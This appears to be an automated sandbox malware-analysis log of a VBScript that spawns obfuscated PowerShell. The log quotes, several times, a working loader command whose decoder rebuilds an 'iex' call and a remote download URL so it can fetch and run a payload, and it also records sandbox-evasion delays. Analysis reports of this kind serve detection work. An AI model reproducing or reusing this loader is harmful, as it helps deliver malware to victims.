Source: Binary string: ion.pdbj source: powershell.exe, 00000002.00000002.2136067379.000002B82A53B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2178700348.000002B842AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\CLR_v4.0n.pdb source: powershell.exe, 00000002.00000002.2135929745.000002B82A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbz source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 00000002.00000002.2136067379.000002B82A54E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbERSPROF] source: powershell.exe, 00000002.00000002.2178700348.000002B842B37000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kumme", "0")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Galactophlebitis) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5798Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4093Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 5380Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000003.2021326364.000001B4139CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.2025295639.000001B4136A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013788718.000001B4136A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013518433.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013650085.000001B413680000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021097550.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013103438.000001B4136F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2025504023.000001B4136F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2013518433.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021097550.000001B4136F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013103438.000001B4136F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2025504023.000001B4136F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
Source: powershell.exe, 00000002.00000002.2178700348.000002B842B21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000000.00000003.2020696147.000001B4139C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7T
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kummelnweaving = 1;$bredders130='substrin';$bredders130+='g';function fjter($olericulturally){$kummelnterdivisional=$olericulturally.length-$kummelnweaving;for($kummel=5; $kummel -lt $kummelnterdivisional; $kummel+=(6)){$endocoele67+=$olericulturally.$bredders130.invoke($kummel, $kummelnweaving);}$endocoele67;}function jardiniere($overparticularity){. ($lflaskernes) ($overparticularity);}$heltalsdivisions=fjter 'betimmsourcoba,rizs,ouxibousol ove.lde sia m,du/erh.e5hrels.impla0 bal, .ran(.rstawpaafuisaltknintond nddoononrew udbosexplo prowlnpostet dig, ,mph1comor0 bes . xyl 0knokk;fugac ga.sewdeserieksplnteko 6eksem4 unap;vil,f ,iscoxindls6skder4,corz;no,ar p.pnsretiopv uopd: ch,f1str,g2 d.da1 cre .moron0aksel)baysv inkshgdermee cicecla sekana ho loin/ k,us2zec i0mortr1vigep0 para0delta1 misu0boble1puche peri.fdevasibogorrsk.dee flodf i,vioturboxce.tr/teuto1 he t2 ra,e1vulga.k.nne0 p.ls ';$maskinkoderne=fjter 'kry pusvar s kantebu.ikran ev-,ardiabehagghemanemolucncerebtrekyl ';$exencephalus=fjter ' s.rihpourpthaemut,mugip hepas annu:quill/cikad/bonded urobr edtsifinagvsvovlehyper.,ugtsg markojumbuotryghgudledl to.ae .tat. unnocom.alophlegmdisjo/codicuaasencr,neb?kursceboothx abdop .ealodotyerbi,iotquadr= jewed brimohydrowudplandornel saucosolilabombadommbl&turnuibalgedpolyp= luf.1 r dso i osfbrnephpsyc p unabnuhaanb benepakutilsttteuinterv syn,cmo.orfe.cashchicotttskrdfantaxfaareg ibrisgle.sutypeazu,vidn sidel ightmdevovd samds sammpforgavfri,ij.doli1afret3kir.nulicit0 shir ';$typhloempyema=fjter 'udlev>.erti ';$lflaskernes=fjter 'avlshibortfeun,rmx pio ';$nonpainter = fjter 'truele triecguldhhbuccaofo.si begiv% shadabiddaprum.opv,sitd 